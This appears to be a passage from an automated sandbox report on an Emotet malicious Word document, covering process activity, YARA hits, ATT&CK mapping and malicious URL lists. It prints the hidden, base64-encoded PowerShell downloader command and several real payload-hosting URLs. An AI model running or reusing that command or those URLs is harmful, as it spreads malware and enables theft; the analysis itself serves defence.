AGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10003D00 cpuid

7_2_10003D00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10029878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	7_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_100307F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_10030A43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_10030C6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_10030D3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10029878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_100307F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_10030A43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_10030C6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_10030D3E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1002A210 GetSystemTimeAsFileTime,

7_2_1002A210

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100012B1 GetVersionExA,CreateWindowExA,ShowWindow,UpdateWindow,

7_2_100012B1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2355747254.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2121698890.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2117620078.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2355718078.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2124305408.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2111015590.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112674690.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2114888366.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2106786697.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108974608.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.6a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Windows Service1	Windows Service1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Process Injection111	Deobfuscate/Decode Files or Information31	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution3	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	System Information Discovery37	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter211	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Security Software Discovery121	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell4	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
info_2020_NJY_31940448.doc	65%	Virustotal		Browse
info_2020_NJY_31940448.doc	42%	Metadefender		Browse
info_2020_NJY_31940448.doc	79%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll	67%	Metadefender		Browse
C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll	86%	ReversingLabs	Win32.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.rundll32.exe.6a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.b20000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.260000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.1b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.1d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.160000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.1b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
allcannabismeds.com	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://ezi-pos.com/categoryl/x/	19%	Virustotal		Browse
http://ezi-pos.com/categoryl/x/	100%	Avira URL Cloud	malware
http://allcannabismeds.com/unraid-map/ZZm6/	18%	Virustotal		Browse
http://allcannabismeds.com/unraid-map/ZZm6/	100%	Avira URL Cloud	malware
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
https://etkindedektiflik.com/pcie-speed/U/	16%	Virustotal		Browse
https://etkindedektiflik.com/pcie-speed/U/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://ienglishabc.com/cow/JH/	16%	Virustotal		Browse
http://ienglishabc.com/cow/JH/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://allcannabismeds.com	12%	Virustotal		Browse
http://allcannabismeds.com	0%	Avira URL Cloud	safe
http://giannaspsychicstudio.com/cgi-bin/PP/	100%	Avira URL Cloud	malware
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://vstsample.com/wp-includes/7eXeI/	100%	Avira URL Cloud	malware
http://152.170.79.100/tkvop2zz2se/0vkwo/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
allcannabismeds.com	35.208.69.64	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://allcannabismeds.com/unraid-map/ZZm6/	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://152.170.79.100/tkvop2zz2se/0vkwo/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	false		high
http://wellformedweb.org/CommentAPI/	rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112295620.00000000024C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ezi-pos.com/categoryl/x/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.iis.fhg.de/audioPA	rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://etkindedektiflik.com/pcie-speed/U/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	false		high
http://treyresearch.net	rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112295620.00000000024C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ienglishabc.com/cow/JH/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2104803337.0000000002340000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111873001.0000000002CF0000.00000002.00000001.sdmp	false		high
http://allcannabismeds.com	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
